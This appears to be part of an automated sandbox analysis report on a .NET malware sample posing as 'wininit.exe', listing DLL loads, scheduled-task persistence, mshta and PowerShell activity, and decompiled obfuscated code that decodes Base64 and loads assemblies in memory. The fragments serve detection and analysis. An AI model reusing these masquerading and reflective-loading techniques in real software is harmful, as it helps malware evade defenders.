                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: wininit.lnk.5.drLNK file: ..\..\..\..\..\wininit.exe
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: BIT6DEB.tmp.3.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.MHG21zpXaSjLHc54CSiedjvW72IGe9UuwAcuGjvjVrq0NTL6IUQNaBcJkQTl9UPl,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.LnfNdMM3pQRdAoxhTB9DU981oCArknyJUhYwPGki4QoTt4lgZ2q5UUmnHa3Bsgjh,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.iz0EXQ3TEvbsDsTkgu4sV5j1vx97rIQVpwOZsxDQXB2yAlJoEqlmQbRwnWepR6PK,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.WlAjoEJDup98sCmD5Hp9GeM0zyod4aOUXUCjhOQIJRBJQDqXVZdLLcZx57YuugZ4,Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.BXI4kmJh7ZYEDFc5xHzxyVb6OA3BF5atOk79qzTB0feHywq8pqPDpyPlkWMOSxFs2fnNcQl4SwEbvNPlRi()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: BIT6DEB.tmp.3.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{u18Yrvd6MHYzWKkpaqIpVdhSMFtlwPlc4jel8z7Z94evmRhK6[2],Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.GLwACZZdCKkhy1QWaJyL9RUyZo0dawz8xKtdEETkQeZ639bK6kjjpJVV4imsXmMaLXqH7q3gUYd1APJWs3(Convert.FromBase64String(u18Yrvd6MHYzWKkpaqIpVdhSMFtlwPlc4jel8z7Z94evmRhK6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: wininit.exe.5.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.MHG21zpXaSjLHc54CSiedjvW72IGe9UuwAcuGjvjVrq0NTL6IUQNaBcJkQTl9UPl,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.LnfNdMM3pQRdAoxhTB9DU981oCArknyJUhYwPGki4QoTt4lgZ2q5UUmnHa3Bsgjh,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.iz0EXQ3TEvbsDsTkgu4sV5j1vx97rIQVpwOZsxDQXB2yAlJoEqlmQbRwnWepR6PK,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.WlAjoEJDup98sCmD5Hp9GeM0zyod4aOUXUCjhOQIJRBJQDqXVZdLLcZx57YuugZ4,Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.BXI4kmJh7ZYEDFc5xHzxyVb6OA3BF5atOk79qzTB0feHywq8pqPDpyPlkWMOSxFs2fnNcQl4SwEbvNPlRi()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: wininit.exe.5.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{u18Yrvd6MHYzWKkpaqIpVdhSMFtlwPlc4jel8z7Z94evmRhK6[2],Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.GLwACZZdCKkhy1QWaJyL9RUyZo0dawz8xKtdEETkQeZ639bK6kjjpJVV4imsXmMaLXqH7q3gUYd1APJWs3(Convert.FromBase64String(u18Yrvd6MHYzWKkpaqIpVdhSMFtlwPlc4jel8z7Z94evmRhK6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.MHG21zpXaSjLHc54CSiedjvW72IGe9UuwAcuGjvjVrq0NTL6IUQNaBcJkQTl9UPl,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.LnfNdMM3pQRdAoxhTB9DU981oCArknyJUhYwPGki4QoTt4lgZ2q5UUmnHa3Bsgjh,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.iz0EXQ3TEvbsDsTkgu4sV5j1vx97rIQVpwOZsxDQXB2yAlJoEqlmQbRwnWepR6PK,UR3gCb328MYbm7MPojEWK4UNCrh0dVx2Hn3KSmCmpvrmxUhdhoV7BBMeTQUAN6hs.WlAjoEJDup98sCmD5Hp9GeM0zyod4aOUXUCjhOQIJRBJQDqXVZdLLcZx57YuugZ4,Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.BXI4kmJh7ZYEDFc5xHzxyVb6OA3BF5atOk79qzTB0feHywq8pqPDpyPlkWMOSxFs2fnNcQl4SwEbvNPlRi()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{u18Yrvd6MHYzWKkpaqIpVdhSMFtlwPlc4jel8z7Z94evmRhK6[2],Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.GLwACZZdCKkhy1QWaJyL9RUyZo0dawz8xKtdEETkQeZ639bK6kjjpJVV4imsXmMaLXqH7q3gUYd1APJWs3(Convert.FromBase64String(u18Yrvd6MHYzWKkpaqIpVdhSMFtlwPlc4jel8z7Z94evmRhK6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: BIT6DEB.tmp.3.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: _79PiUcFY60MV4sY1q8U38GCzz2FBKgfo5xy5WbrD9j4RFOWqC System.AppDomain.Load(byte[])
                      Source: BIT6DEB.tmp.3.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: CLaisFSHgipWnZ55ci4tE2r4WU1M7UpnMzjF4MgO5jMyAq7ks System.AppDomain.Load(byte[])
                      Source: BIT6DEB.tmp.3.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: CLaisFSHgipWnZ55ci4tE2r4WU1M7UpnMzjF4MgO5jMyAq7ks
                      Source: wininit.exe.5.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: _79PiUcFY60MV4sY1q8U38GCzz2FBKgfo5xy5WbrD9j4RFOWqC System.AppDomain.Load(byte[])
                      Source: wininit.exe.5.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: CLaisFSHgipWnZ55ci4tE2r4WU1M7UpnMzjF4MgO5jMyAq7ks System.AppDomain.Load(byte[])
                      Source: wininit.exe.5.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: CLaisFSHgipWnZ55ci4tE2r4WU1M7UpnMzjF4MgO5jMyAq7ks
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: _79PiUcFY60MV4sY1q8U38GCzz2FBKgfo5xy5WbrD9j4RFOWqC System.AppDomain.Load(byte[])
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: CLaisFSHgipWnZ55ci4tE2r4WU1M7UpnMzjF4MgO5jMyAq7ks System.AppDomain.Load(byte[])
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.cs.Net Code: CLaisFSHgipWnZ55ci4tE2r4WU1M7UpnMzjF4MgO5jMyAq7ks
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeCode function: 5_2_00007FF848AE00BD pushad ; iretd 5_2_00007FF848AE00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8489CD2A5 pushad ; iretd 7_2_00007FF8489CD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF848AE09B8 push E95A81D0h; ret 7_2_00007FF848AE09C9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF848AE10A8 push E86F7F0Dh; ret 7_2_00007FF848AE10F9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF848AE00BD pushad ; iretd 7_2_00007FF848AE00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF848BB1AC8 push es; retf 7_2_00007FF848BB1AC9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF8489CD2A5 pushad ; iretd 10_2_00007FF8489CD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848AE00BD pushad ; iretd 10_2_00007FF848AE00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848BB1AC8 push es; retf 10_2_00007FF848BB1AC9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8489ED2A5 pushad ; iretd 12_2_00007FF8489ED2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848B03428 push ebx; iretd 12_2_00007FF848B03452
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848BD259A push eax; iretd 12_2_00007FF848BD25C1
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 19_2_00007FF848AE00BD pushad ; iretd 19_2_00007FF848AE00C1
                      Source: BIT6DEB.tmp.3.dr, O4fo8BCjnNCwEmwjuOk909aLEMrJnQGlNiMmsokpvUNs28JOr9NJOa1KOlvo8fuohjLXCgPy2WhOzv4xur.csHigh entropy of concatenated method names: 'rNzCwKhEA5jxqf2DGIUdk1JROnkQCzlaWEu4XXE8otMASVneNFurAWxFcl1HB1FfGrIJFH3ITC0AWy3Kra', 'vYqE3RhUUuDkKx80UaFt692DM4qhaYJtLNhExNrORa4IoCChppfBfcX2MRt3Ssd9jmnjQTROXTKyKPSkb0', '_6XLj2hTRFFyT8iED3aMgTkI5cbWFRppmJls97KewJHoFOXmdlyh0lDxpfBRnlUbAhg6sCi2Vs0lGGnJXlK', 'L2geSOWG3GoNEH9QYgOD3240', 'D0qNFJPak9qwmms0KvqWsv9N', 'INYJ1lGCXhbaL4RAahO9hO8S', 'UE7uAlQ9OhJCvVA2BeFASEUv', 'HGxSxwm3el1k1QIl5jgRvWhE', 'OpnESpMDLwhqm2YrTWeUezij', 'zPpN1JE9Bgfy2zRdJMnkqYf5'
                      Source: BIT6DEB.tmp.3.dr, jeedmwCGdFhBcqZCA15WaP7jTKXlAF7sGR7nB57ve4F5wgrajMWJJsDDFY0I1vl6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'h59vIOhTuXoIHrkDb7ca9gqUvSP2AXN4Cq3iR2ycTR3nYH4HhGrgeQ7SnTy6dbiJpgpJX0o0NsHd3dEkql', 'BeTuFPnycy6pWb5p1YopgxtblRUi0cqXPdC4b8TTh5OYevCCygB3N36ZQDF4UXlp7lZW3g5zKTP5PGb41z', '_7Io0hzVl8T88nX41KBj4rIb0', 'yMu83MRGOhZkbdIpZjugP14m'
                      Source: BIT6DEB.tmp.3.dr, xaTyEYG3tM6dhGUM43tuLNgAQtUu8Voa3zSAj5FxOU1z62TCl.csHigh entropy of concatenated method names: 'bNRqxAI6ScANdA83639TnYaemlSXwLGwmQbIm4BGWMtPOdgpU', 'KhPuoqOD5oClw0fbPBsy7o8VpCmjLmQAhkfuACCFNnGcRKeh2', 'PleEGhZJ4ayjB57QATIYo8FvhLCIl8kRIZm7I2yllDLENQ8WC', 'wqUTWKp6OfOKixBG32RpId98', 'kg0ZpoaqrzLya4D2c973veMQ', 'CQyMUprWsGeW4c9J5b0dEZnx', 'uWhmyQWPwd008Of90lBInVwE', 'x0YNYitysT2f1B51surYTvQS', '_2A7ePYYHNGJGiyZmXYw6JtDI', '_6PKadTSdIBBTvquFkdnzChzT'
                      Source: BIT6DEB.tmp.3.dr, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csHigh entropy of concatenated method names: 'YP8zvgzbKr3X1TSTzDwz5rPoOMpP47hi2bMGqsjARuO58Awr3', '_7Ae6fk131Q32VUxvWVTQ2vIdaNM2ft2r6ytyMappEY1tsxQFT', 'rdlKghPhNlDVRYiLCJOxLTIDRjMaAJ8ZBqg6oGIhxGn40zYBf', 'OlRjhnbqYda0vWnO0csMwwOwfCIET5cmdwMFkIwispB9P4tLD', 'HQASlGnJ8sWTKhT5gKo2x7e6W7swI15dMn11lP9sdcO5QFm3M', 'Jq0bmtiEusqE1gzakdT8j45P7KS5ReV6bKP0reeEGYL0h9IcK', 'NkEN5kuy33L8z9VUjVtfOzmelJnigmLUvFYguOjVaLSevjBc5', 'TggHJ4WTcTmuS6MDh7BLTYkibpFkhtmWLzN5ScfAeEmQLQ3p5', 'VFYPGKkHfYiunNlVlNWSDPicuWYajg5g49U9YrQC5ov1XAQeD', 'fTKDRvFM49GwUocdW8NzCBgKFKQ3KGErJyPCYrNNknwKoiLVU'
                      Source: BIT6DEB.tmp.3.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.csHigh entropy of concatenated method names: '_200IYWRkJXTEvIev0wyVQ8khuzz5TkaXLRB5odqRv1i1aZFWy', '_79PiUcFY60MV4sY1q8U38GCzz2FBKgfo5xy5WbrD9j4RFOWqC', 'dGmPWh99HplGCmVameubZh6Bn1If4z3SszJenghcDcRscWDZv', 'kk7xwRdXAQjHR3lDKHa4IY1aEU4X6OFZ2QPIIkuJqODCYdnwb', '_3D2GkrlgeTBtjdCapz3A0tAFNjqUw6VztscyZTEY8Jno4DefZ', '_0cA0rRTi3EUU50MCjV09wLrCvJR1ZhbzpZyrMhpraWOFsebkd', 'gPAxFIVD0V9XYobMwdMOUzGryl9Tq6b8PDLiSj93KH9Vr3orP', 'gqGNaCh0zu3iBmJrrJ6D4LVl3RaXyiyt7YnuXheh8mpEIweKn', 'yRdIWKoyLedB5sZgzrCMEYLkznbAQB1C48thx4nKRSqsLja77', 'Q2geSFU2GkHWD6ZCYzuFBiMx2etNoUvSQ4q5T1GDJaTGrr2bp'
                      Source: BIT6DEB.tmp.3.dr, ekkMiDv0naq3sjxJyXfIR1x5yXvl1xKtORIjB3FBlkLzSnlEI.csHigh entropy of concatenated method names: 'S7oci1pip6wZx2y2vUfCY9CCLyBdr6zoDLTU6pfV8e0RGe1HL', 'pyBVG2zto9vz9EE8HnjMKnvrDEQI5Aunko6ShQZXZGixZUKVH', 'navDs1FhMJfT5RIxv6tSK7As017Kp9dD7Rn1wxHrqin2tIDK9', 'WhXvhkddoBH9uFSy5eUcOKkQZHwjJ835epzRkkUbP91WVT7HL', 'gwPhuzzmFIH0oXOkWusYDt6YSJK3x6rvqiWFVVLuT2vU6kL2X', 'vetr6RQtXdLxFQ5LgEhNJXfCf9i3rWWX7rQ1Nyne85wANsWkH', 'TZ36Zj4ysqIFu25fYfzSu5iQP7HgEE3TPXD6F12T18T4OaUtd', 'IM6nIfsB33pJMOxvjlefgnnlHSfZ7opxqlKhTURPZSlWCz1JY', 'zAMDB2Sm7T6vLcNYj4ROolEippMm8FlBTM2fJW8lHuakIEuS0', 'sAs1CvbSSXDTXpIippToMHMCuYJu6jeoptb0nX0Dn8XISn64u'
                      Source: BIT6DEB.tmp.3.dr, 0cgrNmkHxZRuAQEqRimtas6lLl5iBAzJCeHLHLif0Cvv39xyjt35uB2sia2x9huxx5fL0C9RrdrO8HA9Kv.csHigh entropy of concatenated method names: 'NYQjxEafQiKx4H71pyQajo2KOqj1TiUjbeqvnzq9Pr5sZV01IaBmPVj1jdZseqX90REFKGWsK6JHhFbNT9', '_8x41fVnVzdVtXRIhY20zi8q0a3lWuCJZ3a5WYYSod13DX3weAXibqHIfCFCcyAClpDPeZD0OaO1gr1nZkd', 'NG6KL4SqQbctl477Z1rBJeaWdLAOqpZIKLQkoWkzv548d45WOJLPaHLwoQR3K77fr41XP0tvoVN2pt0LMr', 'FNUc2S0sTWx6sILVStIE6r0ZScX9X5SlECl6h9XSvBYmrapkw2NExIUssGjY90yvoV4cwCpYpE8aet08Ua', 'x4ia9IJOWCm9KHfsjDZfCNdn', 'ShNGhW38GUzqDUFKTYramyfe', 'f8jlYeW0h2IjFh7FzKKUg9BU', 'mVzI7aBt1zP6YoGAo2SHrf8b', 'TwmBG6S7RE615Y2U9RdY75nX', 'eyqj4o8T9oE6mMD6EAec6lo4'
                      Source: BIT6DEB.tmp.3.dr, 28YENLqzYH38q0lvSHq8cdgEkxEBgvoW17YoNf76xEbjh3XKx.csHigh entropy of concatenated method names: 'wFjkhLY4LoZKYwJa0AgL7JA91uaNVO2SkT4nyih3Gs4hZ8VGU', 'RUA4E1eRbVUByXGt869zgGugRmKiDQBeP7rGSz8Wurrp58fn0', 'LU47xaoZ2v6v98XVJR117BDC5FmeALSJkIAjBXD9FsAOsYFYH', 'dmPn64gMgTov1b5NPB09PLmiqacm2BLpgYQ9pDVyEUhVTiIot', 'enGUfBbMbPrDYNNcn5KqTGd2rYWqmmITrdhxp8xAoaIYo4jhn', 'kfbhyKaWBd8YKci6LA3h4u1bSxwJ5T5Gbjrol551lVFHYxalA', 'MnkSTQYh4TOxUyl9QNdTSBuObfkq70V76tCLS5EOulQpzBF7i', '_4l0KmjQ39YQqzw57zkobh0SjqKWelJ7LrNeQ2iRqdzCewWTKT', 'cMqeuU3kNgXzh1N4r0KRP0Jc0LsPCe6qbvvwT3G2UBR1TLW2K', 'FAg0JpcnytEPf6Dzm7BR7V5bRQY9ztMRKdryaZ4kQGywh0mva'
                      Source: BIT6DEB.tmp.3.dr, YkVOnCxniKkBgIh2gN6pw5h2FMLgVXKlnmyboGGhhp52kCEnTF5yxtfgYAnkHI4yTcVMQfxkKEn5AvfECo.csHigh entropy of concatenated method names: 'AcisUNCSuVFrBikpjiolvARXB02lFHiP4vtsFOIpIJ2DMbwu28uI7QOSpqz9GU0HPZf20b7gXKNv1moIaH', 'gTRHx9arOKRVotnoIrZKicfQ', 'u9eGy0zRxOfvoHxI8o8ueKAu', 'CBjzxk5vc0zWIz32x0QeW6CU', 'w21H32QCMSqEug7WDQkGRyoy'
                      Source: BIT6DEB.tmp.3.dr, JTUajwZX3bMUNOY0rg3Pwk92NPZAXHesr02c48g1DUybCmimQ.csHigh entropy of concatenated method names: 'e7JEgLIyCKYdgbReH8mq6nqtiAqeh2614BsiouiQLaKibzVCM', 'x21N60NoZ5CLkBrvfK3AdQSj', 'mAGU8HtdtxCs5hmekd1tLME5', 'fQ6mchearhcE8vIuznCdPYZN', 'h66xZRtvI20tuBqdyerpBxSS'
                      Source: BIT6DEB.tmp.3.dr, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csHigh entropy of concatenated method names: 'TaWBmBsELjv5ZsS0acJTWcHbv5YUUXsh570w7OI95hwDxcgYCmWRqlaXspogRYWjbyRGNPGmJWet17cUFB', 'NNrn5oq8k7vsV61gtCbylTPezpy79dUQQh4bwHKzNqQW20CjtxkF1kj0KU1F8NQFlZZk5hLN1YPMOIogDF', 'WIk5b8uMUVcHO1Fp4gQ7qzirTJoI3fKvoBPfwpWdgWeFkBkFd0cWtsb523Vc8xGzqmEshx0aqK7QYu7Fh5', 'yurrNEi67T8C0XBpq87n8zeRyrDeJ0kg90quHF5lXKNxxaaMfxDdqSy3OvrBaMJXSjYzJyPQvHKXCeFCDt', 'YIZzebrGnSb2NRPXP1dEZVqIHIbCxRO5NuGXN592WKiBVffdmpGzZN1f69OV6sBax1xNwHGj01XCjpoU0X', 'QyNbfu3UMCLAq7wREA47xDt8w6tWtuRxUwxKnIBFWESTTstqCDkPbq2Tx3DpcaXcRxahYI0h1RVnzVueZt', '_3NRSEKWHhWrAXapI0GlMsHe6Prjdia8XvttGp9lWFTzJv5YbLrBQE1lWznTmnUBuegzIyOsv3MTVflqOev', 'HnMB8wYHWCvC9e2BWXniO494cO6FSXcr3sGDp4T2vXvZY8vtm0o7Ny85MfvFIkFuTgaZvLwRgdeGTpVC0w', 'KRj7qRjQa2ixwuEkGItZz79XHSyCmUQXoL2jLGQSdMLcMzSNfrcsvkRcxr1s7jjWa3vZ3LXJOmnll2pCkp', 'lYVkbVw3fZHQOQbjuREA8NMLcQXhlcTjTVoNOKnZWJhW4iuhbcJ7fsOaW3bEb4WxtpOBIilBdJCrNueh4p'
